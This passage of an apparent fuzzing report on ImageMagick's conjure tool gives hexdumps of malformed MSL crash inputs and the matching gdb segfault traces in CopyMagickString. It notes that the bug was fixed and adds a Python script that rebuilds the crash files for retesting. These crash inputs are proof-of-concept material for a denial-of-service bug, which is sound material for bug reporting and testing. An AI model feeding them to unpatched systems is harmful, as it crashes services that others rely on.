0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 42 78 34 30 30 22 20 3E 3C 72 65  |e="40Bx400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 67 25 5B 62 61 73 65 2D 77 69 64 74 68  |ge.g%[base-width|
0060  5D 78 25 5B 62 61 69 66 22 20 2F 3E 3C 67 65 74  |]x%[baif" /><get|
0070  20 77 3D 22 62 61 74 22 20 2F 3E 3C 72 65 73 69  | w="bat" /><resi|
0080  6A 65 20 67 65 6F 6D 65 74 72 79 3D 22 25 5B 64  |je geometry="%[d|
0090  69 6D 22 20 2F 3E 3C 67 65 74 20 77 69 64 74 68  |im" /><get width|
00A0  3D 22 77 69 64 74 68 22 20 68 65 69 67 68 74 3D  |="width" height=|
00B0  22 68 65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E  |"height" /><prin|
00C0  74 20 6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72  |t output="zed fr|
00D0  6F 6D 20 25 5B 62 61 73 65 2D 77 69 64 74 68 5D  |om %[base-width]|
00E0  78 25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |x%[base-height] |
00F0  74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 68 65  |to %[width]x%[he|
0100  69 67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69  |ight].\n" /><wri|
0110  74 65 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |te filename="ima|
0120  67 65 2E 65 69 67 68 74 2F 3E 3C 2F 69 6D 61 67  |ge.eight/></imag|
0130  65 3E 0A -- -- -- -- -- -- -- -- -- -- -- -- --  |e>.             |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000003,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000004,sig:06,src:000026,op:havoc,rep:2

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 63 69 7A  |F-8"?><image ciz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 65 2D  |ad filename="ie-|
0050  68 65 69 67 68 74 5D 20 74 6F 20 25 5B 77 69 64  |height] to %[wid|
0060  74 68 5D 78 25 5B 6D 61 67 65 2E 67 69 66 22 20  |th]x%[mage.gif" |
0070  2F 3E 3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F  |/><get w="bat" /|
0080  3E 3C 72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72  |><resize geometr|
0090  79 3D 22 25 5B 64 69 6D 22 20 2F 3E 3C 67 65 74  |y="%[dim" /><get|
00A0  20 77 69 64 74 68 3D 22 77 69 64 74 68 22 20 68  | width="width" h|
00B0  65 69 67 68 74 3D 22 68 65 69 67 68 74 22 20 2F  |eight="height" /|
00C0  3E 3C 70 72 69 6E 74 20 6F 75 74 70 75 74 3D 22  |><print output="|
00D0  7A 65 64 20 66 72 6F 6D 20 25 5B 62 61 73 65 2D  |zed from %[base-|
00E0  77 69 64 74 68 5D 78 25 5B 62 61 73 65 2D 68 65  |width]x%[base-he|
00F0  69 67 68 74 5D 20 74 6F 20 25 5B 77 69 64 74 68  |ight] to %[width|
0100  5D 78 25 5B 68 65 69 67 68 74 5D 2E 5C 6E 22 20  |]x%[height].\n" |
0110  2F 3E 3C 77 72 69 74 65 20 66 69 6C 65 6E 61 6D  |/><write filenam|
0120  65 3D 22 69 6D 61 67 65 2E 70 6E 67 22 20 2F 3E  |e="image.png" />|
0130  3C 2F 69 6D 61 67 65 3E 0A -- -- -- -- -- -- --  |</image>.       |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000004,sig:06,src:000026,op:havoc,rep:2", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000005,sig:06,src:000108,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 67 69 66 20 66 72 6F 6D 20 25 5B 72 61  |ge.gif from %[ra|
0060  73 65 2D 77 69 64 74 68 5D 78 25 5B 62 22 20 2F  |se-width]x%[b" /|
0070  3E 3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F 3E  |><get w="bat" />|
0080  3C 72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72 79  |<resize geometry|
0090  3D 22 25 5B 64 69 6D 22 20 2F 3E 3C 67 65 74 20  |="%[dim" /><get |
00A0  77 69 64 74 68 3D 22 77 69 64 74 68 22 20 68 65  |width="width" he|
00B0  69 67 68 74 3D 22 68 65 69 67 68 74 22 20 2F 3E  |ight="height" />|
00C0  3C 70 72 69 6E 74 20 6F 75 74 70 75 74 3D 22 7A  |<print output="z|
00D0  65 64 20 66 72 6F 6D 20 25 5B 72 61 73 65 2D 77  |ed from %[rase-w|
00E0  69 64 74 68 5D 78 25 5B 62 61 73 65 2D 68 65 69  |idth]x%[base-hei|
00F0  67 68 74 5D 20 74 6F 20 25 5B 77 69 64 74 68 5D  |ght] to %[width]|
0100  78 25 5B 68 65 40 00 68 00 5D 2E 5C 6E 22 20 2F  |x%[he@.h.].\n" /|
0110  3E 3C 77 72 69 74 65 20 66 69 6C 65 6E 61 6D 65  |><write filename|
0120  3D 22 69 6D 61 67 65 2E 70 6E 67 22 20 2F 3E 3C  |="image.png" /><|
0130  2F 69 6D 61 67 65 3E 0A -- -- -- -- -- -- -- --  |/image>.        |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000005,sig:06,src:000108,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

This issue was reported to ImageMagick and fixed rather quickly @ http://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=30797
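The conjure crash inputs are given above only as hexdumps, so verifying the fix against them means turning the dumps back into files first. The script below is an added example, not code from the report or from ImageMagick: it parses that dump format (offset, 16 hex bytes with `--` padding past end of file, ASCII column), checks that the offsets are contiguous, writes the file under the reported id so `conjure -dimensions 10x10 <file>` can be re-run, and reports whether the MSL document is even well-formed XML, which is a quick way to see that the crash input is malformed and that the MSL reader accepts it anyway. The embedded dump is the id:000002 one from above; the output directory is this example's own assumption.

```python
"""Rebuild conjure crash files from the report's hexdumps (added example)."""
import os
import xml.etree.ElementTree as ET

# Crash id:000002 from the report, embedded as sample input (raw string so the
# literal "\n" inside the ASCII column is not turned into a newline).
CRASH_ID = "id:000002,sig:06,src:000000,op:havoc,rep:2"
HEXDUMP = r"""
0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |g%[base-height] |
0060  74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 65 2E  |to %[width]x%[e.|
0070  67 69 66 22 20 2F 3E 3C 67 65 74 20 77 3D 22 62  |gif" /><get w="b|
0080  61 74 22 20 2F 3E 3C 72 65 73 69 7A 65 20 67 65  |at" /><resize ge|
0090  6F 6D 65 74 72 79 3D 22 25 5B 64 69 6D 22 20 22  |ometry="%[dim" "|
00A0  68 65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E 74  |height" /><print|
00B0  20 6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72 6F  | output="zed fro|
00C0  6D 20 25 5B 62 61 73 65 2D 77 69 64 74 68 5D 78  |m %[base-width]x|
00D0  25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20 74  |%[base-height] t|
00E0  6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 68 65 69  |o %[width]x%[hei|
00F0  67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69 74  |ght].\n" /><writ|
0100  65 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61 67  |e filename="imag|
0110  65 2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D 61 67 65  |e.png" /></image|
0120  3E 0A -- -- -- -- -- -- -- -- -- -- -- -- -- --  |>.              |
"""

# Assumed output location; any writable directory works.
OUTDIR = "/tmp/conjure-crashes"


def parse_hexdump(dump):
    """Turn an `offset  XX XX ... |ascii|` dump back into bytes, checking offsets."""
    data = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        left = line.split("|", 1)[0]          # ignore the ASCII column entirely
        tokens = left.split()
        offset = int(tokens[0], 16)
        if offset != len(data):
            raise ValueError(f"offset {offset:#06x} does not follow {len(data):#06x}")
        for tok in tokens[1:]:
            if tok == "--":                   # padding past end of file
                break
            data.append(int(tok, 16))
    return bytes(data)


def is_well_formed_xml(data):
    """True if a strict XML parser accepts the document, False otherwise."""
    try:
        ET.fromstring(data)
        return True
    except ET.ParseError:
        return False


def write_crash_file(data, crash_id, outdir=OUTDIR):
    """Write the reconstructed input under its afl crash id and return the path."""
    os.makedirs(outdir, exist_ok=True)
    path = os.path.join(outdir, crash_id)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    content = parse_hexdump(HEXDUMP)
    path = write_crash_file(content, CRASH_ID)
    print(f"{len(content)} bytes -> {path}; well-formed XML: {is_well_formed_xml(content)}")
    print(f"re-run with: conjure -dimensions 10x10 '{path}'")
```

For this input the strict parser rejects the document at `<resize geometry="%[dim" "height" />`, so anything conjure does with it happens on a document a conforming XML parser would never have delivered; that is worth keeping in mind when deciding which of the six files are really distinct bugs.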